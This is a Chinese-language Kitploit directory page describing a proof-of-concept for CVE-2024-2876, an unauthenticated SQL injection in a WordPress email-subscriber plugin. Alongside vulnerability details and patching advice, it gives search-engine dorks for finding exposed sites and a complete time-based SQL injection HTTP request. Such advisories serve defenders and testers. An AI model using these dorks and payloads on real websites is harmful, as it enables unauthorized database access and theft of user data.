Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-2876 — CVE-2024-2876 的概念验证漏洞利用程序,该漏洞是 Email Subscribers by Icegram Express WordPress 插件中的一个严重 SQL 注入漏洞,允许未经身份验证的攻击者执行任意 SQL 查询。 | Kitploit
工具/GitHubGitHub/aerchy/cve-2024-2876
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubaerchy/cve-2024-2876

CVE-2024-2876

CVE-2024-2876 的概念验证漏洞利用程序,该漏洞是 Email Subscribers by Icegram Express WordPress 插件中的一个严重 SQL 注入漏洞,允许未经身份验证的攻击者执行任意 SQL 查询。

查看仓库
21年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-2876 - Email Subscribers by Icegram Express 插件中的 SQL 注入漏洞

概述

CVE-2024-2876 是在 WordPress 的 "Email Subscribers by Icegram Express" 插件中发现的一个严重安全漏洞。该漏洞影响 5.7.14 及更早版本,对超过 90,000 个网站构成重大风险。

漏洞详情

  • CVE 编号:CVE-2024-2876
  • CVSS 评分:9.8(严重)
  • 受影响版本:5.7.14 及更早版本
  • 已修复版本:5.7.15 及以上版本

描述

该漏洞是一个 SQL 注入缺陷,允许未经身份验证的攻击者在受影响的 WordPress 数据库上执行恶意 SQL 查询。通过操纵未经正确清理的用户输入,攻击者可以提取敏感信息,如用户名、电子邮件地址、密码哈希和订阅者列表。

漏洞利用机制

SQL 注入发生在插件 IG_ES_Subscribers_Query 类的 run 函数中,输入验证不足导致未经授权的 SQL 代码执行。这破坏了存储在 WordPress 数据库中数据的完整性和机密性。

CVE-2024-2876 搜索语法(Dorks)

  • FOFA:body="/wp-content/plugins/email-subscribers/"

  • publicwww:"/wp-content/plugins/email-subscribers/"

CVE-2024-2876 概念验证(POC)

root@kitploit:~
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

修复建议

  1. 立即更新:如果您正在使用 "Email Subscribers by Icegram Express" 插件,请立即升级到 5.7.15 或更高版本以应用安全修复。

  2. 定期审计:定期检查并将所有 WordPress 插件和主题更新到最新版本,以确保安全性。

  3. 安全插件:使用信誉良好的 WordPress 安全插件来增强对 SQL 注入和其他网络威胁的防御能力。

  4. 强密码策略:为与您的 WordPress 网站相关的所有账户实施强且唯一的密码,以降低未经授权访问的风险。

不修复的影响

未能更新受影响的插件可能使网站面临数据泄露和未经授权访问的风险。鉴于该插件的广泛使用,立即采取行动对于保护安装至关重要。

下载工具